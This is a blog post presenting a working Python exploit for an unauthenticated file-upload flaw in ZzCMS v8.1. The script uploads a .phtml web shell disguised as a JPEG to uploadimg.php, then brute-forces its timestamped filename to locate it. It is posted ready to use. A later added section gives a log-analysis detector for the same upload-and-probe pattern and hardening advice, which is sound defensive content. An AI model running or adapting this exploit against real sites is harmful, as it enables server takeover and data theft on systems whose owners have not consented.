ZzCMS v8.1: Unconditional Front-End Getshell

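Category: 颓废's Blog
Summary

Insufficiently strict filtering at one point in zzcms allows arbitrary script files to be uploaded. The exp is posted directly below.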

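The 站长招商网 content management system, ZZCMS for short, is developed by the ZZCMS team. It incorporates database optimization, content caching, AJAX and other techniques, so that the site's security, stability and load capacity are reliably assured. The source code is open and the functional modules are independent, which makes secondary development easy.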


The exp, posted as-is:

```python
# -*- coding:utf-8 -*-
# Python 2 script (print statements, xrange).
import requests
import threading
import time
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-u")
args = parser.parse_args()
urls = args.u
urlib = urls+'uploadimg.php'

# Request one candidate URL and report it if the server answers 200.
def B(url):
    try:
        if requests.get(url,timeout=3).status_code == 200:
            lock.acquire()
            print u"[+++] shell地址:", url
            lock.release()
    except:
        pass

# Post the local file to uploadimg.php with an image content type and
# return the URL prefix /uploadfiles/YYYY-MM/<timestamp> built from local time.
def L(url,filename):
    print u'[+++] ADMINSS:正在尝试上传shell'
    try:
        urls = '%s'%url
        files = {'g_fu_image[]': ('%s'%filename, open('%s'%filename, 'rb'), 'image/jpg', {'Expires': '0'})}
        r = requests.post(urls, files=files)
        fname = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
        froot = '/uploadfiles/'+time.strftime('%Y-%m',time.localtime(time.time()))+'/'
        upfrt = urls+froot+fname
        shll = upfrt.replace('uploadimg.php/', '')
        return shll
    except:
        bugs = u'[+++]ERROR:文件上传失败'
        print bugs

print '[+++] ADMINSS:'+urls
shel = L(urlib,'1.phtml')
shell = shel
print u'[+++] ADMINSS:上传成功 正在爆破shell地址'
lock = threading.Lock()
pool = []
# The stored name ends in a 3-digit suffix, so each value is tried in batches of threads.
for x in xrange(100, 999):
    pool.append(threading.Thread(target=B, args=(shell+str(x)+'.phtml',)))
    if len(pool) > 20 or x == 998:
        for x in pool:
            x.start()
        for x in pool:
            x.join()
        pool = []
```
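Seen from the defender's side, the script above leaves a recognisable trail in the web server's access log: a POST to uploadimg.php followed by requests for 17-digit .phtml names under /uploadfiles/YYYY-MM/. The following log check is an added example, not part of the original post; the log format, the sample lines, the extension list and the names `analyze` and `min_probes` are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access log (common log format, documentation IPs).
SAMPLE_LOG = """\
198.51.100.4 - - [12/Mar/2018:09:30:11 +0800] "POST /uploadimg.php HTTP/1.1" 200 498
198.51.100.4 - - [12/Mar/2018:09:30:12 +0800] "GET /uploadfiles/2018-03/20180312093011245.jpg HTTP/1.1" 200 48211
203.0.113.7 - - [12/Mar/2018:10:15:02 +0800] "POST /uploadimg.php HTTP/1.1" 200 512
203.0.113.7 - - [12/Mar/2018:10:15:03 +0800] "GET /uploadfiles/2018-03/20180312101502100.phtml HTTP/1.1" 404 210
203.0.113.7 - - [12/Mar/2018:10:15:03 +0800] "GET /uploadfiles/2018-03/20180312101502101.phtml HTTP/1.1" 404 210
203.0.113.7 - - [12/Mar/2018:10:15:03 +0800] "GET /uploadfiles/2018-03/20180312101502102.phtml HTTP/1.1" 404 210
203.0.113.7 - - [12/Mar/2018:10:15:04 +0800] "GET /uploadfiles/2018-03/20180312101502103.phtml HTTP/1.1" 200 0
"""

# client, method, request target, status
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Upload naming used by the script on this page: /uploadfiles/YYYY-MM/ +
# 14-digit timestamp + 3 digits. The extension list is an assumption; adapt
# it to whatever your web server hands to the PHP interpreter.
SCRIPT_IN_UPLOADS = re.compile(
    r'/uploadfiles/\d{4}-\d{2}/\d{17}\.(?:php\d?|phtml|pht)$', re.I)


def analyze(log_text, min_probes=3):
    """Return {client: stats} for clients whose requests match the pattern."""
    stats = defaultdict(lambda: {"uploaded": False, "probes": 0, "hits": []})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        s = stats[client]
        if method == "POST" and path.endswith("/uploadimg.php"):
            s["uploaded"] = True
        elif SCRIPT_IN_UPLOADS.search(path):
            s["probes"] += 1
            if status == "200":
                # A script under the upload directory answered: investigate.
                s["hits"].append(path)
    # A POST alone is normal image upload; flag script hits or enumeration.
    return {c: s for c, s in stats.items()
            if s["hits"] or (s["uploaded"] and s["probes"] >= min_probes)}


if __name__ == "__main__":
    for client, s in analyze(SAMPLE_LOG).items():
        print(client, s)
```

A 200 on such a path also shows that the web server executes scripts from the upload directory; turning off script handling there limits the impact even when an upload check is bypassed.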
